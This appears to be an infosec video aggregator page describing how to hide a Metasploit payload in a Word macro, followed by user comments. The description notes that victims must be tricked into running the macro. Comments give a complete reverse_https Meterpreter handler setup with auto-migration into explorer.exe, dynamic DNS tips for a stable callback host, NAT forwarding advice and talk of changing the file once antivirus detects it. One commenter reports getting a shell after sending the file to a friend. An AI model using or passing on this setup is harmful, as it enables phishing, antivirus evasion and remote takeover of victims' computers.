Description: Using Metasploit to create the payload and then setting up a macro within a Word document. At the time this was not detected by AV (see the comments for later detection); however, you still need to trick the user into running the macro. Also migrate out of the Word process as soon as you get the session!
Tags: metasploit, macro, vba, panda
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Nice, macro is fun ;)
Now migrating to another process fast is the challenge! But wait, there is an easier way.
When setting up your multi/handler, use the following options:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 443
set LHOST <IP or hostname>
set AutoRunScript "migrate -n explorer.exe"
exploit -j
Now once a connection is established, the AutoRunScript will run migrate; with -n it will look for a process by name, in this case explorer.exe, and migrate to it.
Using hostnames is much better if your IP address changes a lot. Look up a free dynamic DNS service. With a dynamic DNS service you get a hostname which never changes but you can always change its IP address; that way you won't need to make a new macro document every time your IP changes.
Thanks again Hackett :D Love your videos!
@Hackett: By the way, those steps are for people new to this! Forgot to mention that in the first comment :)
This was my hack lesson for today :) I followed your steps and I was able to get a Meterpreter session on the first shot (on a test VM). It's always fun to discover new ways of executing payloads.
Excellent video, I look forward to seeing more like it.
Thanks!
@j0k3rr - Works like a charm. I usually use InitialAutoRunScript for just a single command.
@PoisonReverse - Glad to hear it, dude :) and thanks!
The creation of the docx was not clear enough to me, so I might have made some mistakes, but Visual Studio is calling an error, pointing at Sub Auto_Open()
no sessions:(:(:(:(:(:(:(
I've also noticed that when the document is opened it will create a new hidden doc with ~$... (which may be irrelevant)
I am using MS Word 2007
I meant the part 1:40-1:48
Great Video! One I will come back to again.
Curious, how well does this work with NAT on an outside network? Is the setup pretty much the same but with the external IP address, and then set the router up to forward all traffic on port 443 to the designated internal IP address? I am going to play with this a little bit more. Thanks again for the tutorial.
Works extremely well with NAT.
Yeah, I played with some settings and sent it to my friend; had a shell real fast. Really like this.
Make sure you auto-migrate as well, otherwise you lose your shell as soon as it's closed. As of this week Symantec now detects this. Time to change it up again.
Not really understanding the auto-migrate; I'll have to research this some.
Researched it some more; going to try this again with the post/windows/manage/migrate module and see if it keeps it open this time. Thanks for the help.